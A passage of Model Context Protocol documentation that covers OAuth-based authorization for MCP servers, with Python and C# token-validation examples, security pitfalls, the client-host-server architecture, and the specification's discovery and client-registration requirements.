- Serves MCP tools requiring authentication
Configuration is loaded from config.py and environment variables.
"""
logging.basicConfig(level=logging.INFO)
try:
config.validate()
oauth_urls = create_oauth_urls()
except ValueError as e:
logger.error("Configuration error: %s", e)
return 1
try:
mcp_server = create_server()
logger.info("Starting MCP Server on %s:%s", config.HOST, config.PORT)
logger.info("Authorization Server: %s", oauth_urls["issuer"])
logger.info("Transport: %s", config.TRANSPORT)
mcp_server.run(transport=config.TRANSPORT)
return 0
except Exception:
logger.exception("Server error")
return 1
if __name__ == "__main__":
exit(main())
```
Lastly, the token verification logic is delegated entirely to `token_verifier.py`, which uses the Keycloak introspection endpoint to verify the validity of any credential artifacts:
```python theme={null}
"""Token verifier implementation using OAuth 2.0 Token Introspection (RFC 7662)."""
import logging
from typing import Any
from mcp.server.auth.provider import AccessToken, TokenVerifier
from mcp.shared.auth_utils import check_resource_allowed, resource_url_from_server_url
logger = logging.getLogger(__name__)
class IntrospectionTokenVerifier(TokenVerifier):
"""Token verifier that uses OAuth 2.0 Token Introspection (RFC 7662).
"""
def __init__(
self,
introspection_endpoint: str,
server_url: str,
client_id: str,
client_secret: str,
):
self.introspection_endpoint = introspection_endpoint
self.server_url = server_url
self.client_id = client_id
self.client_secret = client_secret
self.resource_url = resource_url_from_server_url(server_url)
async def verify_token(self, token: str) -> AccessToken | None:
"""Verify token via introspection endpoint."""
import httpx
if not self.introspection_endpoint.startswith(("https://", "http://localhost", "http://127.0.0.1")):
return None
timeout = httpx.Timeout(10.0, connect=5.0)
limits = httpx.Limits(max_connections=10, max_keepalive_connections=5)
async with httpx.AsyncClient(
timeout=timeout,
limits=limits,
verify=True,
) as client:
try:
form_data = {
"token": token,
"client_id": self.client_id,
"client_secret": self.client_secret,
}
headers = {"Content-Type": "application/x-www-form-urlencoded"}
response = await client.post(
self.introspection_endpoint,
data=form_data,
headers=headers,
)
if response.status_code != 200:
return None
data = response.json()
if not data.get("active", False):
return None
if not self._validate_resource(data):
return None
return AccessToken(
token=token,
client_id=data.get("client_id", "unknown"),
scopes=data.get("scope", "").split() if data.get("scope") else [],
expires_at=data.get("exp"),
resource=data.get("aud"), # Include resource in token
)
            except Exception as e:
                # Log the failure instead of swallowing it silently
                logger.warning("Token introspection failed: %s", e)
                return None
def _validate_resource(self, token_data: dict[str, Any]) -> bool:
"""Validate token was issued for this resource server.
Rules:
- Reject if 'aud' missing.
- Accept if any audience entry matches the derived resource URL.
- Supports string or list forms per JWT spec.
"""
if not self.server_url or not self.resource_url:
return False
aud: list[str] | str | None = token_data.get("aud")
if isinstance(aud, list):
return any(self._is_valid_resource(a) for a in aud)
if isinstance(aud, str):
return self._is_valid_resource(aud)
return False
def _is_valid_resource(self, resource: str) -> bool:
"""Check if the given resource matches our server."""
return check_resource_allowed(self.resource_url, resource)
```
For more details, see the [Python SDK documentation](https://github.com/modelcontextprotocol/python-sdk).
You can see the complete C# project in the [sample repository](https://github.com/localden/min-cs-mcp-auth).
To set up authorization in your MCP server using the MCP C# SDK, you can lean on the standard ASP.NET Core builder pattern. Instead of using the introspection endpoint provided by Keycloak, we will use built-in ASP.NET Core capabilities for token validation.
```csharp theme={null}
using Microsoft.AspNetCore.Authentication.JwtBearer;
using Microsoft.IdentityModel.Tokens;
using ModelContextProtocol.AspNetCore.Authentication;
using ProtectedMcpServer.Tools;
using System.Security.Claims;
var builder = WebApplication.CreateBuilder(args);
var serverUrl = "http://localhost:3000/";
var authorizationServerUrl = "http://localhost:8080/realms/master/";
builder.Services.AddAuthentication(options =>
{
options.DefaultChallengeScheme = McpAuthenticationDefaults.AuthenticationScheme;
options.DefaultAuthenticateScheme = JwtBearerDefaults.AuthenticationScheme;
})
.AddJwtBearer(options =>
{
options.Authority = authorizationServerUrl;
var normalizedServerAudience = serverUrl.TrimEnd('/');
options.TokenValidationParameters = new TokenValidationParameters
{
ValidIssuer = authorizationServerUrl,
ValidAudiences = new[] { normalizedServerAudience, serverUrl },
AudienceValidator = (audiences, securityToken, validationParameters) =>
{
if (audiences == null) return false;
foreach (var aud in audiences)
{
if (string.Equals(aud.TrimEnd('/'), normalizedServerAudience, StringComparison.OrdinalIgnoreCase))
{
return true;
}
}
return false;
}
};
options.RequireHttpsMetadata = false; // Set to true in production
options.Events = new JwtBearerEvents
{
OnTokenValidated = context =>
{
var name = context.Principal?.Identity?.Name ?? "unknown";
var email = context.Principal?.FindFirstValue("preferred_username") ?? "unknown";
Console.WriteLine($"Token validated for: {name} ({email})");
return Task.CompletedTask;
},
OnAuthenticationFailed = context =>
{
Console.WriteLine($"Authentication failed: {context.Exception.Message}");
return Task.CompletedTask;
},
};
})
.AddMcp(options =>
{
options.ResourceMetadata = new()
{
Resource = new Uri(serverUrl),
ResourceDocumentation = new Uri("https://docs.example.com/api/math"),
AuthorizationServers = { new Uri(authorizationServerUrl) },
ScopesSupported = ["mcp:tools"]
};
});
builder.Services.AddAuthorization();
builder.Services.AddHttpContextAccessor();
builder.Services.AddMcpServer()
.WithTools()
.WithHttpTransport();
var app = builder.Build();
app.UseAuthentication();
app.UseAuthorization();
app.MapMcp().RequireAuthorization();
Console.WriteLine($"Starting MCP server with authorization at {serverUrl}");
Console.WriteLine($"Using Keycloak server at {authorizationServerUrl}");
Console.WriteLine($"Protected Resource Metadata URL: {serverUrl}.well-known/oauth-protected-resource");
Console.WriteLine("Exposed Math tools: Add, Multiply");
Console.WriteLine("Press Ctrl+C to stop the server");
app.Run(serverUrl);
```
For more details, see the [C# SDK documentation](https://github.com/modelcontextprotocol/csharp-sdk).
## Testing the MCP Server
For testing purposes, we will be using [Visual Studio Code](https://code.visualstudio.com), but any client that supports MCP and the current authorization specification will work.
Press Cmd + Shift + P (Ctrl + Shift + P on Windows and Linux) and select **MCP: Add server...**. Select **HTTP** and enter `http://localhost:3000`. Give the server a unique name to be used inside Visual Studio Code. In `mcp.json` you should now see an entry like this:
```json theme={null}
"my-mcp-server-18676652": {
"url": "http://localhost:3000",
"type": "http"
}
```
On connection, you will be taken to the browser, where you will be prompted to consent to Visual Studio Code having access to the `mcp:tools` scope.
After consenting, you will see the tools listed right above the server entry in `mcp.json`.
You will be able to invoke individual tools with the help of the `#` sign in the chat view.
## Common Pitfalls and How to Avoid Them
For comprehensive security guidance, including attack vectors, mitigation strategies, and implementation best practices, make sure to read through [Security Best Practices](/specification/draft/basic/security_best_practices). A few key issues are called out below.
* **Do not implement token validation or authorization logic by yourself**. Use off-the-shelf, well-tested, and secure libraries for things like token validation or authorization decisions. Doing everything from scratch means that you're more likely to implement things incorrectly unless you are a security expert.
* **Use short-lived access tokens**. Depending on the authorization server used, this setting might be customizable. We recommend against long-lived tokens: if a malicious actor steals one, they can maintain access for an extended period.
* **Always validate tokens**. Just because your server received a token does not mean that the token is valid or that it's meant for your server. Always verify that what your MCP server is getting from the client matches the required constraints.
* **Store tokens in secure, encrypted storage**. In certain scenarios, you might need to cache tokens server-side. If that is the case, ensure that the storage has the right access controls and cannot be easily exfiltrated by malicious parties with access to your server. You should also implement robust cache eviction policies to ensure that your MCP server is not re-using expired or otherwise invalid tokens.
* **Enforce HTTPS in production**. Do not accept tokens or redirect callbacks over plain HTTP except for `localhost` during development.
* **Least-privilege scopes**. Don't use catch‑all scopes. Split access per tool or capability where possible and verify required scopes per route/tool on the resource server.
* **Don't log credentials**. Never log `Authorization` headers, tokens, codes, or secrets. Scrub query strings and headers. Redact sensitive fields in structured logs.
* **Separate app vs. resource server credentials**. Don't reuse your MCP server's client secret for end‑user flows. Store all secrets in a proper secret manager, not in source control.
* **Return proper challenges**. On 401, include `WWW-Authenticate` with `Bearer`, `realm`, and `resource_metadata` so clients can discover how to authenticate.
* **DCR (Dynamic Client Registration) controls**. If enabled, be aware of constraints specific to your organization, such as trusted hosts, required vetting, and audited registrations. Unauthenticated DCR means that anyone can register any client with your authorization server.
* **Multi‑tenant/realm mix-ups**. Pin to a single issuer/tenant unless explicitly multi‑tenant. Reject tokens from other realms even if signed by the same authorization server.
* **Audience/resource indicator misuse**. Don't configure or accept generic audiences (like `api`) or unrelated resources. Require the audience/resource to match your configured server.
* **Error detail leakage**. Return generic messages to clients, but log detailed reasons with correlation IDs internally to aid troubleshooting without exposing internals.
* **Session identifier hardening**. Treat `Mcp-Session-Id` as untrusted input; never tie authorization to it. Regenerate on auth changes and validate lifecycle server‑side.
## Related Standards and Documentation
MCP authorization builds on these well-established standards:
* **[OAuth 2.1](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13)**: The core authorization framework
* **[RFC 8414](https://datatracker.ietf.org/doc/html/rfc8414)**: Authorization Server Metadata discovery
* **[RFC 7591](https://datatracker.ietf.org/doc/html/rfc7591)**: Dynamic Client Registration
* **[RFC 9728](https://datatracker.ietf.org/doc/html/rfc9728)**: Protected Resource Metadata
* **[RFC 8707](https://datatracker.ietf.org/doc/html/rfc8707)**: Resource Indicators
For additional details, refer to:
* [Authorization Specification](/specification/draft/basic/authorization)
* [Security Best Practices](/specification/draft/basic/security_best_practices)
* [Available MCP SDKs](/docs/sdk)
Understanding these standards will help you implement authorization correctly and troubleshoot issues when they arise.
# Architecture
Source: https://modelcontextprotocol.io/specification/2025-11-25/architecture/index
The Model Context Protocol (MCP) follows a client-host-server architecture where each
host can run multiple client instances. This architecture enables users to integrate AI
capabilities across applications while maintaining clear security boundaries and
isolating concerns. Built on JSON-RPC, MCP provides a stateful session protocol focused
on context exchange and sampling coordination between clients and servers.
## Core Components
```mermaid theme={null}
graph LR
subgraph "Application Host Process"
H[Host]
C1[Client 1]
C2[Client 2]
C3[Client 3]
H --> C1
H --> C2
H --> C3
end
subgraph "Local machine"
S1[Server 1 Files & Git]
S2[Server 2 Database]
R1[("Local Resource A")]
R2[("Local Resource B")]
C1 --> S1
C2 --> S2
S1 <--> R1
S2 <--> R2
end
subgraph "Internet"
S3[Server 3 External APIs]
R3[("Remote Resource C")]
C3 --> S3
S3 <--> R3
end
```
### Host
The host process acts as the container and coordinator:
* Creates and manages multiple client instances
* Controls client connection permissions and lifecycle
* Enforces security policies and consent requirements
* Handles user authorization decisions
* Coordinates AI/LLM integration and sampling
* Manages context aggregation across clients
### Clients
Each client is created by the host and maintains an isolated server connection:
* Establishes one stateful session per server
* Handles protocol negotiation and capability exchange
* Routes protocol messages bidirectionally
* Manages subscriptions and notifications
* Maintains security boundaries between servers
A host application creates and manages multiple clients, with each client having a 1:1
relationship with a particular server.
### Servers
Servers provide specialized context and capabilities:
* Expose resources, tools and prompts via MCP primitives
* Operate independently with focused responsibilities
* Request sampling through client interfaces
* Must respect security constraints
* Can be local processes or remote services
## Design Principles
MCP is built on several key design principles that inform its architecture and
implementation:
1. **Servers should be extremely easy to build**
* Host applications handle complex orchestration responsibilities
* Servers focus on specific, well-defined capabilities
* Simple interfaces minimize implementation overhead
* Clear separation enables maintainable code
2. **Servers should be highly composable**
* Each server provides focused functionality in isolation
* Multiple servers can be combined seamlessly
* Shared protocol enables interoperability
* Modular design supports extensibility
3. **Servers should not be able to read the whole conversation, nor "see into" other
servers**
* Servers receive only necessary contextual information
* Full conversation history stays with the host
* Each server connection maintains isolation
* Cross-server interactions are controlled by the host
* Host process enforces security boundaries
4. **Features can be added to servers and clients progressively**
* Core protocol provides minimal required functionality
* Additional capabilities can be negotiated as needed
* Servers and clients evolve independently
* Protocol designed for future extensibility
* Backwards compatibility is maintained
## Capability Negotiation
The Model Context Protocol uses a capability-based negotiation system where clients and
servers explicitly declare their supported features during initialization. Capabilities
determine which protocol features and primitives are available during a session.
* Servers declare capabilities like resource subscriptions, tool support, and prompt
templates
* Clients declare capabilities like sampling support and notification handling
* Both parties must respect declared capabilities throughout the session
* Additional capabilities can be negotiated through extensions to the protocol
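As a concrete illustration, here is a sketch of the capability exchange during initialization; the names and values shown (client/server names, versions, capability choices) are hypothetical, while the message shapes follow the protocol schema:

```typescript theme={null}
// Sketch of an initialize exchange. The client declares what it can do
// (e.g., sampling, roots); the server answers with its own capabilities.
const initializeRequest = {
  jsonrpc: "2.0",
  id: 1,
  method: "initialize",
  params: {
    protocolVersion: "2025-11-25",
    capabilities: {
      sampling: {},                 // client can service sampling requests
      roots: { listChanged: true }, // client emits roots list notifications
    },
    clientInfo: { name: "example-client", version: "1.0.0" },
  },
};

const initializeResult = {
  jsonrpc: "2.0",
  id: 1,
  result: {
    protocolVersion: "2025-11-25",
    capabilities: {
      tools: { listChanged: true },   // server exposes tools
      resources: { subscribe: true }, // server supports resource subscriptions
    },
    serverInfo: { name: "example-server", version: "1.0.0" },
  },
};
```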
```mermaid theme={null}
sequenceDiagram
participant Host
participant Client
participant Server
Host->>+Client: Initialize client
Client->>+Server: Initialize session with capabilities
Server-->>Client: Respond with supported capabilities
Note over Host,Server: Active Session with Negotiated Features
loop Client Requests
Host->>Client: User- or model-initiated action
Client->>Server: Request (tools/resources)
Server-->>Client: Response
Client-->>Host: Update UI or respond to model
end
loop Server Requests
Server->>Client: Request (sampling)
Client->>Host: Forward to AI
Host-->>Client: AI response
Client-->>Server: Response
end
loop Notifications
Server--)Client: Resource updates
Client--)Server: Status changes
end
Host->>Client: Terminate
Client->>-Server: End session
deactivate Server
```
Each capability unlocks specific protocol features for use during the session. For
example:
* Implemented [server features](/specification/2025-11-25/server) must be advertised in the
server's capabilities
* Emitting resource subscription notifications requires the server to declare
subscription support
* Tool invocation requires the server to declare tool capabilities
* [Sampling](/specification/2025-11-25/client) requires the client to declare support in its
capabilities
This capability negotiation ensures clients and servers have a clear understanding of
supported functionality while maintaining protocol extensibility.
# Authorization
Source: https://modelcontextprotocol.io/specification/2025-11-25/basic/authorization
**Protocol Revision**: 2025-11-25
## Introduction
### Purpose and Scope
The Model Context Protocol provides authorization capabilities at the transport level,
enabling MCP clients to make requests to restricted MCP servers on behalf of resource
owners. This specification defines the authorization flow for HTTP-based transports.
### Protocol Requirements
Authorization is **OPTIONAL** for MCP implementations. When supported:
* Implementations using an HTTP-based transport **SHOULD** conform to this specification.
* Implementations using an STDIO transport **SHOULD NOT** follow this specification, and
instead retrieve credentials from the environment.
* Implementations using alternative transports **MUST** follow established security best
practices for their protocol.
### Standards Compliance
This authorization mechanism is based on established specifications listed below, but
implements a selected subset of their features to ensure security and interoperability
while maintaining simplicity:
* OAuth 2.1 IETF DRAFT ([draft-ietf-oauth-v2-1-13](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-v2-1-13))
* OAuth 2.0 Authorization Server Metadata
([RFC8414](https://datatracker.ietf.org/doc/html/rfc8414))
* OAuth 2.0 Dynamic Client Registration Protocol
([RFC7591](https://datatracker.ietf.org/doc/html/rfc7591))
* OAuth 2.0 Protected Resource Metadata ([RFC9728](https://datatracker.ietf.org/doc/html/rfc9728))
* OAuth Client ID Metadata Documents ([draft-ietf-oauth-client-id-metadata-document-00](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-client-id-metadata-document-00))
## Roles
A protected *MCP server* acts as an [OAuth 2.1 resource server](https://www.ietf.org/archive/id/draft-ietf-oauth-v2-1-13.html#name-roles),
capable of accepting and responding to protected resource requests using access tokens.
An *MCP client* acts as an [OAuth 2.1 client](https://www.ietf.org/archive/id/draft-ietf-oauth-v2-1-13.html#name-roles),
making protected resource requests on behalf of a resource owner.
The *authorization server* is responsible for interacting with the user (if necessary) and issuing access tokens for use at the MCP server.
The implementation details of the authorization server are beyond the scope of this specification. It may be hosted with the
resource server or a separate entity. The [Authorization Server Discovery section](#authorization-server-discovery)
specifies how an MCP server indicates the location of its corresponding authorization server to a client.
## Overview
1. Authorization servers **MUST** implement OAuth 2.1 with appropriate security
measures for both confidential and public clients.
2. Authorization servers and MCP clients **SHOULD** support OAuth Client ID Metadata Documents
([draft-ietf-oauth-client-id-metadata-document-00](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-client-id-metadata-document-00)).
3. Authorization servers and MCP clients **MAY** support the OAuth 2.0 Dynamic Client Registration
Protocol ([RFC7591](https://datatracker.ietf.org/doc/html/rfc7591)).
4. MCP servers **MUST** implement OAuth 2.0 Protected Resource Metadata ([RFC9728](https://datatracker.ietf.org/doc/html/rfc9728)).
MCP clients **MUST** use OAuth 2.0 Protected Resource Metadata for authorization server discovery.
5. MCP authorization servers **MUST** provide at least one of the following discovery mechanisms:
* OAuth 2.0 Authorization Server Metadata ([RFC8414](https://datatracker.ietf.org/doc/html/rfc8414))
* [OpenID Connect Discovery 1.0](https://openid.net/specs/openid-connect-discovery-1_0.html)
MCP clients **MUST** support both discovery mechanisms to obtain the information required to interact with the authorization server.
## Authorization Server Discovery
This section describes the mechanisms by which MCP servers advertise their associated
authorization servers to MCP clients, as well as the discovery process through which MCP
clients can determine authorization server endpoints and supported capabilities.
### Authorization Server Location
MCP servers **MUST** implement the OAuth 2.0 Protected Resource Metadata ([RFC9728](https://datatracker.ietf.org/doc/html/rfc9728))
specification to indicate the locations of authorization servers. The Protected Resource Metadata document returned by the MCP server **MUST** include
the `authorization_servers` field containing at least one authorization server.
The specific use of `authorization_servers` is beyond the scope of this specification; implementers should consult
OAuth 2.0 Protected Resource Metadata ([RFC9728](https://datatracker.ietf.org/doc/html/rfc9728)) for
guidance on implementation details.
Implementors should note that Protected Resource Metadata documents can define multiple authorization servers. The responsibility for selecting which authorization server to use lies with the MCP client, following the guidelines specified in
[RFC9728 Section 7.6 "Authorization Servers"](https://datatracker.ietf.org/doc/html/rfc9728#name-authorization-servers).
### Protected Resource Metadata Discovery Requirements
MCP servers **MUST** implement one of the following discovery mechanisms to provide authorization server location information to MCP clients:
1. **WWW-Authenticate Header**: Include the resource metadata URL in the `WWW-Authenticate` HTTP header under `resource_metadata` when returning `401 Unauthorized` responses, as described in [RFC9728 Section 5.1](https://datatracker.ietf.org/doc/html/rfc9728#name-www-authenticate-response).
2. **Well-Known URI**: Serve metadata at a well-known URI as specified in [RFC9728](https://datatracker.ietf.org/doc/html/rfc9728). This can be either:
* At the path of the server's MCP endpoint: `https://example.com/public/mcp` could host metadata at `https://example.com/.well-known/oauth-protected-resource/public/mcp`
* At the root: `https://example.com/.well-known/oauth-protected-resource`
MCP clients **MUST** support both discovery mechanisms and use the resource metadata URL from the parsed `WWW-Authenticate` headers when present; otherwise, they **MUST** fall back to constructing and requesting the well-known URIs in the order listed above.
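To make the fallback concrete, here is a minimal sketch of constructing the candidate well-known URIs for a given MCP endpoint (the helper name is hypothetical):

```typescript theme={null}
// Derive the Protected Resource Metadata URLs to probe, in the fallback
// priority order described above: path-scoped first, then root.
function protectedResourceMetadataUrls(mcpEndpoint: string): string[] {
  const url = new URL(mcpEndpoint);
  const path = url.pathname.replace(/\/$/, "");
  const candidates: string[] = [];
  if (path && path !== "/") {
    // e.g. https://example.com/public/mcp →
    //      https://example.com/.well-known/oauth-protected-resource/public/mcp
    candidates.push(`${url.origin}/.well-known/oauth-protected-resource${path}`);
  }
  candidates.push(`${url.origin}/.well-known/oauth-protected-resource`);
  return candidates;
}
```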
MCP servers **SHOULD** include a `scope` parameter in the `WWW-Authenticate` header as defined in
[RFC 6750 Section 3](https://datatracker.ietf.org/doc/html/rfc6750#section-3)
to indicate the scopes required for accessing the resource. This provides clients with immediate
guidance on the appropriate scopes to request during authorization,
following the principle of least privilege and preventing clients from requesting excessive permissions.
The scopes included in the `WWW-Authenticate` challenge **MAY** match `scopes_supported`, be a subset
or superset of it, or an alternative collection that is neither a strict subset nor
superset. Clients **MUST NOT** assume any particular set relationship between the challenged
scope set and `scopes_supported`. Clients **MUST** treat the scopes provided in the
challenge as authoritative for satisfying the current request. Servers **SHOULD** strive for
consistency in how they construct scope sets but they are not required to surface every dynamically
issued scope through `scopes_supported`.
Example 401 response with scope guidance:
```http theme={null}
HTTP/1.1 401 Unauthorized
WWW-Authenticate: Bearer resource_metadata="https://mcp.example.com/.well-known/oauth-protected-resource",
scope="files:read"
```
MCP clients **MUST** be able to parse `WWW-Authenticate` headers and respond appropriately to `HTTP 401 Unauthorized` responses from the MCP server.
If the `scope` parameter is absent, clients **SHOULD** apply the fallback behavior defined in the [Scope Selection Strategy](#scope-selection-strategy) section.
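A minimal sketch of extracting the challenge parameters from such a response follows; the regex-based parsing is for illustration only, and production clients should use a robust header parser:

```typescript theme={null}
// Pull key="value" parameters (resource_metadata, scope, error, ...) out of
// a Bearer challenge in a WWW-Authenticate header.
function parseBearerChallenge(header: string): Record<string, string> {
  const params: Record<string, string> = {};
  for (const match of header.matchAll(/(\w+)="([^"]*)"/g)) {
    params[match[1]] = match[2];
  }
  return params;
}

const challenge = parseBearerChallenge(
  'Bearer resource_metadata="https://mcp.example.com/.well-known/oauth-protected-resource", scope="files:read"',
);
// challenge.resource_metadata → metadata URL to fetch
// challenge.scope            → scopes to request during authorization
```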
### Authorization Server Metadata Discovery
To handle different issuer URL formats and ensure interoperability with both OAuth 2.0 Authorization Server Metadata and OpenID Connect Discovery 1.0 specifications, MCP clients **MUST** attempt multiple well-known endpoints when discovering authorization server metadata.
The discovery approach is based on [RFC8414 Section 3.1 "Authorization Server Metadata Request"](https://datatracker.ietf.org/doc/html/rfc8414#section-3.1) for OAuth 2.0 Authorization Server Metadata discovery and [RFC8414 Section 5 "Compatibility Notes"](https://datatracker.ietf.org/doc/html/rfc8414#section-5) for OpenID Connect Discovery 1.0 interoperability.
For issuer URLs with path components (e.g., `https://auth.example.com/tenant1`), clients **MUST** try endpoints in the following priority order:
1. OAuth 2.0 Authorization Server Metadata with path insertion: `https://auth.example.com/.well-known/oauth-authorization-server/tenant1`
2. OpenID Connect Discovery 1.0 with path insertion: `https://auth.example.com/.well-known/openid-configuration/tenant1`
3. OpenID Connect Discovery 1.0 path appending: `https://auth.example.com/tenant1/.well-known/openid-configuration`
For issuer URLs without path components (e.g., `https://auth.example.com`), clients **MUST** try:
1. OAuth 2.0 Authorization Server Metadata: `https://auth.example.com/.well-known/oauth-authorization-server`
2. OpenID Connect Discovery 1.0: `https://auth.example.com/.well-known/openid-configuration`
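A sketch of building these candidate discovery URLs (the helper name is hypothetical):

```typescript theme={null}
// Build authorization server metadata URLs in the priority order above.
function authorizationServerMetadataUrls(issuer: string): string[] {
  const url = new URL(issuer);
  const path = url.pathname.replace(/\/$/, "");
  if (path && path !== "/") {
    return [
      `${url.origin}/.well-known/oauth-authorization-server${path}`, // OAuth, path insertion
      `${url.origin}/.well-known/openid-configuration${path}`,       // OIDC, path insertion
      `${url.origin}${path}/.well-known/openid-configuration`,       // OIDC, path appending
    ];
  }
  return [
    `${url.origin}/.well-known/oauth-authorization-server`,
    `${url.origin}/.well-known/openid-configuration`,
  ];
}
```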
### Authorization Server Discovery Sequence Diagram
The following diagram outlines an example flow:
```mermaid theme={null}
sequenceDiagram
participant C as Client
participant M as MCP Server (Resource Server)
participant A as Authorization Server
Note over C: Attempt unauthenticated MCP request
C->>M: MCP request without token
M-->>C: HTTP 401 Unauthorized (may include WWW-Authenticate header)
alt Header includes resource_metadata
Note over C: Extract resource_metadata URL from header
C->>M: GET resource_metadata URI
M-->>C: Resource metadata with authorization server URL
else No resource_metadata in header
Note over C: Fallback to well-known URI probing
Note over M: _Not applicable if the MCP server is at the root_
C->>M: GET /.well-known/oauth-protected-resource/mcp
alt Sub-path metadata found
M-->>C: Resource metadata with authorization server URL
else Sub-path not found
C->>M: GET /.well-known/oauth-protected-resource
alt Root metadata found
M-->>C: Resource metadata with authorization server URL
else Root metadata not found
Note over C: Abort or use pre-configured values
end
end
end
Note over C: Validate RS metadata, build AS metadata URL
C->>A: GET Authorization server metadata endpoint
Note over C,A: Try OAuth 2.0 and OpenID Connect discovery endpoints in priority order
A-->>C: Authorization server metadata
Note over C,A: OAuth 2.1 authorization flow happens here
C->>A: Token request
A-->>C: Access token
C->>M: MCP request with access token
M-->>C: MCP response
Note over C,M: MCP communication continues with valid token
```
## Client Registration Approaches
MCP supports three client registration mechanisms. Choose based on your scenario:
* **Client ID Metadata Documents**: When client and server have no prior relationship (most common)
* **Pre-registration**: When client and server have an existing relationship
* **Dynamic Client Registration**: For backwards compatibility or specific requirements
Clients supporting all options **SHOULD** use the following priority order (a sketch of this selection logic follows the list):
1. Use pre-registered client information for the server if the client has it available
2. Use Client ID Metadata Documents if the Authorization Server indicates that it supports them (via `client_id_metadata_document_supported` in OAuth Authorization Server Metadata)
3. Use Dynamic Client Registration as a fallback if the Authorization Server supports it (via `registration_endpoint` in OAuth Authorization Server Metadata)
4. Prompt the user to enter the client information if no other option is available
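The metadata field names below come from OAuth Authorization Server Metadata; the helper itself is a hypothetical sketch:

```typescript theme={null}
// Pick a registration approach in the priority order above.
function chooseRegistration(
  meta: {
    client_id_metadata_document_supported?: boolean;
    registration_endpoint?: string;
  },
  preRegisteredClientId?: string,
): "pre-registered" | "client-id-metadata-document" | "dynamic-registration" | "prompt-user" {
  if (preRegisteredClientId) return "pre-registered";
  if (meta.client_id_metadata_document_supported) return "client-id-metadata-document";
  if (meta.registration_endpoint) return "dynamic-registration";
  return "prompt-user";
}
```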
### Client ID Metadata Documents
MCP clients and authorization servers **SHOULD** support OAuth Client ID Metadata Documents as specified in
[OAuth Client ID Metadata Document](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-client-id-metadata-document-00).
This approach enables clients to use HTTPS URLs as client identifiers, where the URL points to a JSON document
containing client metadata. This addresses the common MCP scenario where servers and clients have
no pre-existing relationship.
#### Implementation Requirements
MCP implementations supporting Client ID Metadata Documents **MUST** follow the requirements specified in
[OAuth Client ID Metadata Document](https://datatracker.ietf.org/doc/html/draft-ietf-oauth-client-id-metadata-document-00).
Key requirements include:
**For MCP Clients:**
* Clients **MUST** host their metadata document at an HTTPS URL following RFC requirements
* The `client_id` URL **MUST** use the "https" scheme and contain a path component, e.g. `https://example.com/client.json`
* The metadata document **MUST** include at least the following properties: `client_id`, `client_name`, `redirect_uris`
* Clients **MUST** ensure the `client_id` value in the metadata matches the document URL exactly
* Clients **MAY** use `private_key_jwt` for client authentication (e.g., for requests to the token endpoint) with appropriate JWKS configuration as described in [Section 6.2 of Client ID Metadata Document](https://www.ietf.org/archive/id/draft-ietf-oauth-client-id-metadata-document-00.html#section-6.2)
**For Authorization Servers:**
* **SHOULD** fetch metadata documents when encountering URL-formatted `client_id` values
* **MUST** validate that the fetched document's `client_id` matches the URL exactly
* **SHOULD** cache metadata respecting HTTP cache headers
* **MUST** validate redirect URIs presented in an authorization request against those in the metadata document
* **MUST** validate the document structure is valid JSON and contains required fields
* **SHOULD** follow the security considerations in [Section 6 of Client ID Metadata Document](https://www.ietf.org/archive/id/draft-ietf-oauth-client-id-metadata-document-00.html#section-6)
#### Example Metadata Document
```json theme={null}
{
"client_id": "https://app.example.com/oauth/client-metadata.json",
"client_name": "Example MCP Client",
"client_uri": "https://app.example.com",
"logo_uri": "https://app.example.com/logo.png",
"redirect_uris": [
"http://127.0.0.1:3000/callback",
"http://localhost:3000/callback"
],
"grant_types": ["authorization_code"],
"response_types": ["code"],
"token_endpoint_auth_method": "none"
}
```
#### Client ID Metadata Documents Flow
The following diagram illustrates the complete flow when using Client ID Metadata Documents:
```mermaid theme={null}
sequenceDiagram
participant User
participant Client as MCP Client
participant Server as Authorization Server
participant Metadata as Metadata Endpoint (Client's HTTPS URL)
participant Resource as MCP Server
Note over Client,Metadata: Client hosts metadata at https://app.example.com/oauth/metadata.json
User->>Client: Initiates connection to MCP Server
Client->>Server: Authorization Request client_id=https://app.example.com/oauth/metadata.json redirect_uri=http://localhost:3000/callback
Server->>User: Authentication prompt
User->>Server: Provides credentials
Note over Server: Authenticates user
Note over Server: Detects URL-formatted client_id
Server->>Metadata: GET https://app.example.com/oauth/metadata.json
Metadata-->>Server: JSON Metadata Document {client_id, client_name, redirect_uris, ...}
Note over Server: Validates: 1. client_id matches URL 2. redirect_uri in allowed list 3. Document structure valid 4. (Optional) Domain allowed via trust policy
alt Validation Success
Server->>User: Display consent page with client_name
User->>Server: Approves access
Server->>Client: Authorization code via redirect_uri
Client->>Server: Exchange code for token client_id=https://app.example.com/oauth/metadata.json
Server-->>Client: Access token
Client->>Resource: MCP requests with access token
Resource-->>Client: MCP responses
else Validation Failure
Server->>User: Error response error=invalid_client or invalid_request
end
Note over Server: Cache metadata for future requests (respecting HTTP cache headers)
```
#### Discovery
Authorization servers advertise that they support clients using Client ID Metadata Documents by including the following property in their OAuth Authorization Server metadata:
```json theme={null}
{
"client_id_metadata_document_supported": true
}
```
MCP clients **SHOULD** check for this capability and **MAY** fall back to Dynamic Client Registration
or pre-registration if unavailable.
### Preregistration
MCP clients **SHOULD** support an option for static client credentials, such as those supplied by a preregistration flow. This could mean:
1. Hardcoding a client ID (and, if applicable, client credentials) specifically for the MCP client to use when
   interacting with that authorization server, or
2. Presenting a UI to users that allows them to enter these details after registering an
   OAuth client themselves (e.g., through a configuration interface hosted by the
   server).
### Dynamic Client Registration
MCP clients and authorization servers **MAY** support the
OAuth 2.0 Dynamic Client Registration Protocol [RFC7591](https://datatracker.ietf.org/doc/html/rfc7591)
to allow MCP clients to obtain OAuth client IDs without user interaction.
This option is included for backwards compatibility with earlier versions of the MCP authorization spec.
## Scope Selection Strategy
When implementing authorization flows, MCP clients **SHOULD** follow the principle of least privilege by requesting
only the scopes necessary for their intended operations. During the initial authorization handshake, MCP clients
**SHOULD** follow this priority order for scope selection:
1. **Use `scope` parameter** from the initial `WWW-Authenticate` header in the 401 response, if provided
2. **If `scope` is not available**, use all scopes defined in `scopes_supported` from the Protected Resource Metadata document, omitting the `scope` parameter if `scopes_supported` is undefined.
This approach accommodates the general-purpose nature of MCP clients, which typically lack domain-specific knowledge to make informed decisions about individual scope selection. Requesting all available scopes allows the authorization server and end-user to determine appropriate permissions during the consent process.
This approach minimizes user friction while following the principle of least privilege.
The `scopes_supported` field is intended to represent the minimal set of scopes necessary
